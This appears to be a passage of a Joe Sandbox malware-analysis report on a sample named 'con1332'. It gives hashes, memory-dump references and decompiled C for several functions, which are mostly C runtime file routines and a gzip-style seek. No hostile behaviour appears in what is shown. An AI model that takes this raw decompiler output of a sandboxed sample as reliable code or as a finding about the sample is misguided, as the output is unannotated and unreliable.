                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_con1332.jbxd
                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                                    • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                                                                                                                                                                    • API String ID: 1646373207-3105848591
                                                                                                                                                                                                                                    • Opcode ID: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
                                                                                                                                                                                                                                    • Instruction ID: 3bb3582238f4ecb0ba7b9e8fe578e45fdcf0af3c55e5dfe2a5e3893bc0ad87fb
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 96F06230600A09E2DB105FA1ED1E2EFBB74BB80746F5101A19196B0194DF38D0B6825A
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 02BF1B57 Relevance: 6.3, APIs: 5, Instructions: 77stringCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • lstrlen.KERNEL32(?), ref: 02BF1B6D
                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000001), ref: 02BF1B96
                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 02BF1BA7
                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 02BF1BBF
                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 02BF1BE7
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.327606223.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_2bf0000_con1332.jbxd
                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ByteCharMultiWide$ErrorLastlstrlen
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3322701435-0
                                                                                                                                                                                                                                    • Opcode ID: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                                                                                                                                                                                                                                    • Instruction ID: 45e0a846e73360d13d32198de8f6fb62db6b9734b61efff310776b985f058832
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3B11C431100354FBD3309B59CC88F677F6CEB86BA9F008594FE599A281D721A808C6B4
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 0040C748 Relevance: 6.1, APIs: 4, Instructions: 148COMMONLIBRARYCODE
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 86%
                                                                                                                                                                                                                                    			E0040C748(void* __edx, void* __esi, char _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* __ebx;
				void* __edi;
				void* __ebp;
				signed int _t70;
				signed int _t71;
				intOrPtr _t73;
				signed int _t75;
				signed int _t81;
				char _t82;
				signed int _t84;
				intOrPtr* _t86;
				signed int _t87;
				intOrPtr* _t90;
				signed int _t92;
				signed int _t94;
				void* _t96;
				signed char _t98;
				signed int _t99;
				intOrPtr _t102;
				signed int _t103;
				intOrPtr* _t104;
				signed int _t111;
				signed int _t114;
				intOrPtr _t115;

				_t105 = __esi;
				_t97 = __edx;
				_t104 = _a4;
				_t87 = 0;
				_t121 = _t104;
				if(_t104 != 0) {
					_t70 = E0040FA20(__edx, _t104, _t104);
					__eflags =  *(_t104 + 4);
					_v8 = _t70;
					if(__eflags < 0) {
						 *(_t104 + 4) = 0;
					}
					_push(1);
					_push(_t87);
					_push(_t70);
					_t71 = E00411939(_t87, _t97, _t104, _t105, __eflags);
					__eflags = _t71 - _t87;
					_v12 = _t71;
					if(_t71 < _t87) {
						L2:
						return _t71 | 0xffffffff;
					} else {
						_t98 =  *(_t104 + 0xc);
						__eflags = _t98 & 0x00000108;
						if((_t98 & 0x00000108) != 0) {
							_t73 =  *_t104;
							_t92 =  *(_t104 + 8);
							_push(_t105);
							_v16 = _t73 - _t92;
							__eflags = _t98 & 0x00000003;
							if((_t98 & 0x00000003) == 0) {
								__eflags = _t98;
								if(__eflags < 0) {
									L15:
									__eflags = _v12 - _t87;
									if(_v12 != _t87) {
										__eflags =  *(_t104 + 0xc) & 0x00000001;
										if(( *(_t104 + 0xc) & 0x00000001) == 0) {
											L40:
											_t75 = _v16 + _v12;
											__eflags = _t75;
											L41:
											return _t75;
										}
										_t99 =  *(_t104 + 4);
										__eflags = _t99 - _t87;
										if(_t99 != _t87) {
											_t90 = 0x423f60 + (_v8 >> 5) * 4;
											_a4 = _t73 - _t92 + _t99;
											_t111 = (_v8 & 0x0000001f) << 6;
											__eflags =  *( *_t90 + _t111 + 4) & 0x00000080;
											if(__eflags == 0) {
												L39:
												_t66 =  &_v12;
												 *_t66 = _v12 - _a4;
												__eflags =  *_t66;
												goto L40;
											}
											_push(2);
											_push(0);
											_push(_v8);
											__eflags = E00411939(_t90, _t99, _t104, _t111, __eflags) - _v12;
											if(__eflags != 0) {
												_push(0);
												_push(_v12);
												_push(_v8);
												_t81 = E00411939(_t90, _t99, _t104, _t111, __eflags);
												__eflags = _t81;
												if(_t81 >= 0) {
													_t82 = 0x200;
													__eflags = _a4 - 0x200;
													if(_a4 > 0x200) {
														L35:
														_t82 =  *((intOrPtr*)(_t104 + 0x18));
														L36:
														_a4 = _t82;
														__eflags =  *( *_t90 + _t111 + 4) & 0x00000004;
														L37:
														if(__eflags != 0) {
															_t63 =  &_a4;
															 *_t63 = _a4 + 1;
															__eflags =  *_t63;
														}
														goto L39;
													}
													_t94 =  *(_t104 + 0xc);
													__eflags = _t94 & 0x00000008;
													if((_t94 & 0x00000008) == 0) {
														goto L35;
													}
													__eflags = _t94 & 0x00000400;
													if((_t94 & 0x00000400) == 0) {
														goto L36;
													}
													goto L35;
												}
												L31:
												_t75 = _t81 | 0xffffffff;
												goto L41;
											}
											_t84 =  *(_t104 + 8);
											_t96 = _a4 + _t84;
											while(1) {
												__eflags = _t84 - _t96;
												if(_t84 >= _t96) {
													break;
												}
												__eflags =  *_t84 - 0xa;
												if( *_t84 == 0xa) {
													_t44 =  &_a4;
													 *_t44 = _a4 + 1;
													__eflags =  *_t44;
												}
												_t84 = _t84 + 1;
												__eflags = _t84;
											}
											__eflags =  *(_t104 + 0xc) & 0x00002000;
											goto L37;
										}
										_v16 = _t87;
										goto L40;
									}
									_t75 = _v16;
									goto L41;
								}
								_t81 = E0040BFC1(__eflags);
								 *_t81 = 0x16;
								goto L31;
							}
							_t102 =  *((intOrPtr*)(0x423f60 + (_v8 >> 5) * 4));
							_t114 = (_v8 & 0x0000001f) << 6;
							__eflags =  *(_t102 + _t114 + 4) & 0x00000080;
							if(( *(_t102 + _t114 + 4) & 0x00000080) == 0) {
								goto L15;
							}
							_t103 = _t92;
							__eflags = _t103 - _t73;
							if(_t103 >= _t73) {
								goto L15;
							}
							_t115 = _t73;
							do {
								__eflags =  *_t103 - 0xa;
								if( *_t103 == 0xa) {
									_v16 = _v16 + 1;
									_t87 = 0;
									__eflags = 0;
								}
								_t103 = _t103 + 1;
								__eflags = _t103 - _t115;
							} while (_t103 < _t115);
							goto L15;
						}
						return _t71 -  *(_t104 + 4);
					}
				}
				_t86 = E0040BFC1(_t121);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				 *_t86 = 0x16;
				_t71 = E0040E744(__edx, _t104, __esi);
				goto L2;
			}






























                                                                                                                                                                                                                                    0x0040c748
                                                                                                                                                                                                                                    0x0040c748
                                                                                                                                                                                                                                    0x0040c752
                                                                                                                                                                                                                                    0x0040c755
                                                                                                                                                                                                                                    0x0040c757
                                                                                                                                                                                                                                    0x0040c759
                                                                                                                                                                                                                                    0x0040c77c
                                                                                                                                                                                                                                    0x0040c781
                                                                                                                                                                                                                                    0x0040c785
                                                                                                                                                                                                                                    0x0040c788
                                                                                                                                                                                                                                    0x0040c78a
                                                                                                                                                                                                                                    0x0040c78a
                                                                                                                                                                                                                                    0x0040c78d
                                                                                                                                                                                                                                    0x0040c78f
                                                                                                                                                                                                                                    0x0040c790
                                                                                                                                                                                                                                    0x0040c791
                                                                                                                                                                                                                                    0x0040c799
                                                                                                                                                                                                                                    0x0040c79b
                                                                                                                                                                                                                                    0x0040c79e
                                                                                                                                                                                                                                    0x0040c773
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040c7a0
                                                                                                                                                                                                                                    0x0040c7a0
                                                                                                                                                                                                                                    0x0040c7a3
                                                                                                                                                                                                                                    0x0040c7a9
                                                                                                                                                                                                                                    0x0040c7b3
                                                                                                                                                                                                                                    0x0040c7b5
                                                                                                                                                                                                                                    0x0040c7b8
                                                                                                                                                                                                                                    0x0040c7bd
                                                                                                                                                                                                                                    0x0040c7c0
                                                                                                                                                                                                                                    0x0040c7c3
                                                                                                                                                                                                                                    0x0040c806
                                                                                                                                                                                                                                    0x0040c808
                                                                                                                                                                                                                                    0x0040c7f9
                                                                                                                                                                                                                                    0x0040c7f9
                                                                                                                                                                                                                                    0x0040c7fc
                                                                                                                                                                                                                                    0x0040c81a
                                                                                                                                                                                                                                    0x0040c81e
                                                                                                                                                                                                                                    0x0040c8d8
                                                                                                                                                                                                                                    0x0040c8de
                                                                                                                                                                                                                                    0x0040c8de
                                                                                                                                                                                                                                    0x0040c8e0
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040c8e0
                                                                                                                                                                                                                                    0x0040c824
                                                                                                                                                                                                                                    0x0040c827
                                                                                                                                                                                                                                    0x0040c829
                                                                                                                                                                                                                                    0x0040c843
                                                                                                                                                                                                                                    0x0040c84a
                                                                                                                                                                                                                                    0x0040c84f
                                                                                                                                                                                                                                    0x0040c852
                                                                                                                                                                                                                                    0x0040c857
                                                                                                                                                                                                                                    0x0040c8d2
                                                                                                                                                                                                                                    0x0040c8d5
                                                                                                                                                                                                                                    0x0040c8d5
                                                                                                                                                                                                                                    0x0040c8d5
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040c8d5
                                                                                                                                                                                                                                    0x0040c859
                                                                                                                                                                                                                                    0x0040c85b
                                                                                                                                                                                                                                    0x0040c85d
                                                                                                                                                                                                                                    0x0040c868
                                                                                                                                                                                                                                    0x0040c86b
                                                                                                                                                                                                                                    0x0040c88d
                                                                                                                                                                                                                                    0x0040c88f
                                                                                                                                                                                                                                    0x0040c892
                                                                                                                                                                                                                                    0x0040c895
                                                                                                                                                                                                                                    0x0040c89d
                                                                                                                                                                                                                                    0x0040c89f
                                                                                                                                                                                                                                    0x0040c8a6
                                                                                                                                                                                                                                    0x0040c8ab
                                                                                                                                                                                                                                    0x0040c8ae
                                                                                                                                                                                                                                    0x0040c8c0
                                                                                                                                                                                                                                    0x0040c8c0
                                                                                                                                                                                                                                    0x0040c8c3
                                                                                                                                                                                                                                    0x0040c8c3
                                                                                                                                                                                                                                    0x0040c8c8
                                                                                                                                                                                                                                    0x0040c8cd
                                                                                                                                                                                                                                    0x0040c8cd
                                                                                                                                                                                                                                    0x0040c8cf
                                                                                                                                                                                                                                    0x0040c8cf
                                                                                                                                                                                                                                    0x0040c8cf
                                                                                                                                                                                                                                    0x0040c8cf
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040c8cd
                                                                                                                                                                                                                                    0x0040c8b0
                                                                                                                                                                                                                                    0x0040c8b3
                                                                                                                                                                                                                                    0x0040c8b6
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040c8b8
                                                                                                                                                                                                                                    0x0040c8be
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040c8be
                                                                                                                                                                                                                                    0x0040c8a1
                                                                                                                                                                                                                                    0x0040c8a1
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040c8a1
                                                                                                                                                                                                                                    0x0040c86d
                                                                                                                                                                                                                                    0x0040c873
                                                                                                                                                                                                                                    0x0040c880
                                                                                                                                                                                                                                    0x0040c880
                                                                                                                                                                                                                                    0x0040c882
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040c877
                                                                                                                                                                                                                                    0x0040c87a
                                                                                                                                                                                                                                    0x0040c87c
                                                                                                                                                                                                                                    0x0040c87c
                                                                                                                                                                                                                                    0x0040c87c
                                                                                                                                                                                                                                    0x0040c87c
                                                                                                                                                                                                                                    0x0040c87f
                                                                                                                                                                                                                                    0x0040c87f
                                                                                                                                                                                                                                    0x0040c87f
                                                                                                                                                                                                                                    0x0040c884
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040c884
                                                                                                                                                                                                                                    0x0040c82b
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040c82b
                                                                                                                                                                                                                                    0x0040c7fe
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040c7fe
                                                                                                                                                                                                                                    0x0040c80a
                                                                                                                                                                                                                                    0x0040c80f
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040c80f
                                                                                                                                                                                                                                    0x0040c7ce
                                                                                                                                                                                                                                    0x0040c7d8
                                                                                                                                                                                                                                    0x0040c7db
                                                                                                                                                                                                                                    0x0040c7e0
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040c7e2
                                                                                                                                                                                                                                    0x0040c7e4
                                                                                                                                                                                                                                    0x0040c7e6
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040c7e8
                                                                                                                                                                                                                                    0x0040c7ea
                                                                                                                                                                                                                                    0x0040c7ea
                                                                                                                                                                                                                                    0x0040c7ed
                                                                                                                                                                                                                                    0x0040c7ef
                                                                                                                                                                                                                                    0x0040c7f2
                                                                                                                                                                                                                                    0x0040c7f2
                                                                                                                                                                                                                                    0x0040c7f2
                                                                                                                                                                                                                                    0x0040c7f4
                                                                                                                                                                                                                                    0x0040c7f5
                                                                                                                                                                                                                                    0x0040c7f5
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040c7ea
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040c7ab
                                                                                                                                                                                                                                    0x0040c79e
                                                                                                                                                                                                                                    0x0040c75b
                                                                                                                                                                                                                                    0x0040c760
                                                                                                                                                                                                                                    0x0040c761
                                                                                                                                                                                                                                    0x0040c762
                                                                                                                                                                                                                                    0x0040c763
                                                                                                                                                                                                                                    0x0040c764
                                                                                                                                                                                                                                    0x0040c765
                                                                                                                                                                                                                                    0x0040c76b
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • __fileno.LIBCMT ref: 0040C77C
                                                                                                                                                                                                                                    • __locking.LIBCMT ref: 0040C791
                                                                                                                                                                                                                                      • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                                                                                                                                                                                                      • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.326634560.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.326634560.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.326634560.000000000042F000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_con1332.jbxd
                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: __decode_pointer__fileno__getptd_noexit__locking
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2395185920-0
                                                                                                                                                                                                                                    • Opcode ID: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
                                                                                                                                                                                                                                    • Instruction ID: 30055f4621fb528cea72007990449f1feb1a7f288d573051c200dc5e1a244c20
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CC51CF72E00209EBDB10AF69C9C0B59BBA1AF01355F14C27AD915B73D1D378AE41DB8D
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 02BFC9AF Relevance: 6.1, APIs: 4, Instructions: 148COMMONLIBRARYCODE
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • __fileno.LIBCMT ref: 02BFC9E3
                                                                                                                                                                                                                                    • __locking.LIBCMT ref: 02BFC9F8
                                                                                                                                                                                                                                      • Part of subcall function 02BFC228: __getptd_noexit.LIBCMT ref: 02BFC228
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.327606223.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_2bf0000_con1332.jbxd
                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: __fileno__getptd_noexit__locking
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 630670418-0
                                                                                                                                                                                                                                    • Opcode ID: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
                                                                                                                                                                                                                                    • Instruction ID: ea84130f37afed3e7404d9a72e2db1063a92f03943b3df2caefed8d44c0083f1
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F751A475E0020DAFDB51DF68C980B59BFB1EF05358F1481E6DA25A7285D730AAD9CB80
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 00405D00 Relevance: 6.1, APIs: 4, Instructions: 137COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 97%
                                                                                                                                                                                                                                    			E00405D00(void* __ebx, void* __edx, void* __ebp, signed int* _a4, signed int _a8, intOrPtr _a12) {
				void* __edi;
				void* __esi;
				signed int _t30;
				signed int _t31;
				signed int _t32;
				signed int _t33;
				signed int _t35;
				signed int _t39;
				void* _t42;
				intOrPtr _t43;
				void* _t45;
				signed int _t48;
				signed int* _t53;
				void* _t54;
				void* _t55;
				void* _t57;

				_t54 = __ebp;
				_t45 = __edx;
				_t42 = __ebx;
				_t53 = _a4;
				if(_t53 == 0) {
					L40:
					_t31 = _t30 | 0xffffffff;
					__eflags = _t31;
					return _t31;
				} else {
					_t43 = _a12;
					if(_t43 == 2) {
						goto L40;
					} else {
						_t30 = _t53[0xe];
						if(_t30 == 0xffffffff || _t30 == 0xfffffffd) {
							goto L40;
						} else {
							_t48 = _a8;
							if(_t53[0x17] != 0x77) {
								__eflags = _t43 - 1;
								if(_t43 == 1) {
									_t48 = _t48 + _t53[0x1a];
									__eflags = _t48;
								}
								__eflags = _t48;
								if(_t48 < 0) {
									goto L39;
								} else {
									__eflags = _t53[0x16];
									if(__eflags == 0) {
										_t33 = _t53[0x1a];
										__eflags = _t48 - _t33;
										if(_t48 < _t33) {
											_t30 = E004054F0(_t42, _t54, _t53);
											_t55 = _t55 + 4;
											__eflags = _t30;
											if(_t30 < 0) {
												goto L39;
											} else {
												goto L27;
											}
										} else {
											_t48 = _t48 - _t33;
											L27:
											__eflags = _t48;
											if(_t48 == 0) {
												L38:
												return _t53[0x1a];
											} else {
												__eflags = _t53[0x12];
												if(_t53[0x12] != 0) {
													L30:
													__eflags = _t53[0x1b] - 0xffffffff;
													if(_t53[0x1b] != 0xffffffff) {
														_t53[0x1a] = _t53[0x1a] + 1;
														_t48 = _t48 - 1;
														__eflags = _t53[0x1c];
														_t53[0x1b] = 0xffffffff;
														if(_t53[0x1c] != 0) {
															_t53[0xe] = 1;
														}
													}
													__eflags = _t48;
													if(_t48 <= 0) {
														goto L38;
													} else {
														while(1) {
															_t35 = 0x4000;
															__eflags = _t48 - 0x4000;
															if(_t48 < 0x4000) {
																_t35 = _t48;
															}
															_t30 = E00405A20(_t45, _t53, _t53[0x12], _t35);
															_t55 = _t55 + 0xc;
															__eflags = _t30;
															if(_t30 <= 0) {
																goto L39;
															}
															_t48 = _t48 - _t30;
															__eflags = _t48;
															if(_t48 > 0) {
																continue;
															} else {
																goto L38;
															}
															goto L41;
														}
														goto L39;
													}
												} else {
													_t30 = E0040B84D(_t42, _t45, _t48, 0x4000);
													_t55 = _t55 + 4;
													_t53[0x12] = _t30;
													__eflags = _t30;
													if(_t30 == 0) {
														goto L39;
													} else {
														goto L30;
													}
												}
											}
										}
									} else {
										_push(0);
										_push(_t48);
										_push(_t53[0x10]);
										_t53[0x1b] = 0xffffffff;
										_t53[1] = 0;
										 *_t53 = _t53[0x11];
										_t30 = E0040C46B(_t42, _t53[0x10], _t48, _t53, __eflags);
										__eflags = _t30;
										if(_t30 < 0) {
											goto L39;
										} else {
											_t53[0x1a] = _t48;
											_t53[0x19] = _t48;
											return _t48;
										}
									}
								}
							} else {
								if(_t43 == 0) {
									_t48 = _t48 - _t53[0x19];
								}
								if(_t48 < 0) {
									L39:
									_t32 = _t30 | 0xffffffff;
									__eflags = _t32;
									return _t32;
								} else {
									if(_t53[0x11] != 0) {
										L11:
										if(_t48 <= 0) {
											L17:
											return _t53[0x19];
										} else {
											while(1) {
												_t39 = 0x4000;
												if(_t48 < 0x4000) {
													_t39 = _t48;
												}
												_t30 = E00405260(_t42, _t45, _t53, _t53[0x11], _t39);
												_t55 = _t55 + 0xc;
												if(_t30 == 0) {
													goto L39;
												}
												_t48 = _t48 - _t30;
												if(_t48 > 0) {
													continue;
												} else {
													goto L17;
												}
												goto L41;
											}
											goto L39;
										}
									} else {
										_t30 = E0040B84D(_t42, _t45, _t48, 0x4000);
										_t57 = _t55 + 4;
										_t53[0x11] = _t30;
										if(_t30 == 0) {
											goto L39;
										} else {
											E0040BA30(_t48, _t30, 0, 0x4000);
											_t55 = _t57 + 0xc;
											goto L11;
										}
									}
								}
							}
						}
					}
				}
				L41:
			}



















                                                                                                                                                                                                                                    0x00405d00
                                                                                                                                                                                                                                    0x00405d00
                                                                                                                                                                                                                                    0x00405d00
                                                                                                                                                                                                                                    0x00405d01
                                                                                                                                                                                                                                    0x00405d07
                                                                                                                                                                                                                                    0x00405e7f
                                                                                                                                                                                                                                    0x00405e7f
                                                                                                                                                                                                                                    0x00405e7f
                                                                                                                                                                                                                                    0x00405e83
                                                                                                                                                                                                                                    0x00405d0d
                                                                                                                                                                                                                                    0x00405d0d
                                                                                                                                                                                                                                    0x00405d14
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00405d1a
                                                                                                                                                                                                                                    0x00405d1a
                                                                                                                                                                                                                                    0x00405d20
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00405d2f
                                                                                                                                                                                                                                    0x00405d34
                                                                                                                                                                                                                                    0x00405d38
                                                                                                                                                                                                                                    0x00405dad
                                                                                                                                                                                                                                    0x00405db0
                                                                                                                                                                                                                                    0x00405db2
                                                                                                                                                                                                                                    0x00405db2
                                                                                                                                                                                                                                    0x00405db2
                                                                                                                                                                                                                                    0x00405db5
                                                                                                                                                                                                                                    0x00405db7
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00405dbd
                                                                                                                                                                                                                                    0x00405dbd
                                                                                                                                                                                                                                    0x00405dc1
                                                                                                                                                                                                                                    0x00405df8
                                                                                                                                                                                                                                    0x00405dfb
                                                                                                                                                                                                                                    0x00405dfd
                                                                                                                                                                                                                                    0x00405e04
                                                                                                                                                                                                                                    0x00405e09
                                                                                                                                                                                                                                    0x00405e0c
                                                                                                                                                                                                                                    0x00405e0e
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00405dff
                                                                                                                                                                                                                                    0x00405dff
                                                                                                                                                                                                                                    0x00405e10
                                                                                                                                                                                                                                    0x00405e10
                                                                                                                                                                                                                                    0x00405e12
                                                                                                                                                                                                                                    0x00405e73
                                                                                                                                                                                                                                    0x00405e78
                                                                                                                                                                                                                                    0x00405e14
                                                                                                                                                                                                                                    0x00405e14
                                                                                                                                                                                                                                    0x00405e18
                                                                                                                                                                                                                                    0x00405e2e
                                                                                                                                                                                                                                    0x00405e2e
                                                                                                                                                                                                                                    0x00405e32
                                                                                                                                                                                                                                    0x00405e34
                                                                                                                                                                                                                                    0x00405e37
                                                                                                                                                                                                                                    0x00405e38
                                                                                                                                                                                                                                    0x00405e3c
                                                                                                                                                                                                                                    0x00405e43
                                                                                                                                                                                                                                    0x00405e45
                                                                                                                                                                                                                                    0x00405e45
                                                                                                                                                                                                                                    0x00405e43
                                                                                                                                                                                                                                    0x00405e4c
                                                                                                                                                                                                                                    0x00405e4e
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00405e50
                                                                                                                                                                                                                                    0x00405e50
                                                                                                                                                                                                                                    0x00405e50
                                                                                                                                                                                                                                    0x00405e55
                                                                                                                                                                                                                                    0x00405e57
                                                                                                                                                                                                                                    0x00405e59
                                                                                                                                                                                                                                    0x00405e59
                                                                                                                                                                                                                                    0x00405e61
                                                                                                                                                                                                                                    0x00405e66
                                                                                                                                                                                                                                    0x00405e69
                                                                                                                                                                                                                                    0x00405e6b
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00405e6d
                                                                                                                                                                                                                                    0x00405e6f
                                                                                                                                                                                                                                    0x00405e71
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00405e71
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00405e50
                                                                                                                                                                                                                                    0x00405e1a
                                                                                                                                                                                                                                    0x00405e1f
                                                                                                                                                                                                                                    0x00405e24
                                                                                                                                                                                                                                    0x00405e27
                                                                                                                                                                                                                                    0x00405e2a
                                                                                                                                                                                                                                    0x00405e2c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00405e2c
                                                                                                                                                                                                                                    0x00405e18
                                                                                                                                                                                                                                    0x00405e12
                                                                                                                                                                                                                                    0x00405dc3
                                                                                                                                                                                                                                    0x00405dc9
                                                                                                                                                                                                                                    0x00405dcb
                                                                                                                                                                                                                                    0x00405dcc
                                                                                                                                                                                                                                    0x00405dcd
                                                                                                                                                                                                                                    0x00405dd4
                                                                                                                                                                                                                                    0x00405ddb
                                                                                                                                                                                                                                    0x00405ddd
                                                                                                                                                                                                                                    0x00405de5
                                                                                                                                                                                                                                    0x00405de7
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00405ded
                                                                                                                                                                                                                                    0x00405ded
                                                                                                                                                                                                                                    0x00405df0
                                                                                                                                                                                                                                    0x00405df7
                                                                                                                                                                                                                                    0x00405df7
                                                                                                                                                                                                                                    0x00405de7
                                                                                                                                                                                                                                    0x00405dc1
                                                                                                                                                                                                                                    0x00405d3a
                                                                                                                                                                                                                                    0x00405d3c
                                                                                                                                                                                                                                    0x00405d3e
                                                                                                                                                                                                                                    0x00405d3e
                                                                                                                                                                                                                                    0x00405d43
                                                                                                                                                                                                                                    0x00405e79
                                                                                                                                                                                                                                    0x00405e7a
                                                                                                                                                                                                                                    0x00405e7a
                                                                                                                                                                                                                                    0x00405e7e
                                                                                                                                                                                                                                    0x00405d49
                                                                                                                                                                                                                                    0x00405d4d
                                                                                                                                                                                                                                    0x00405d77
                                                                                                                                                                                                                                    0x00405d79
                                                                                                                                                                                                                                    0x00405da7
                                                                                                                                                                                                                                    0x00405dac
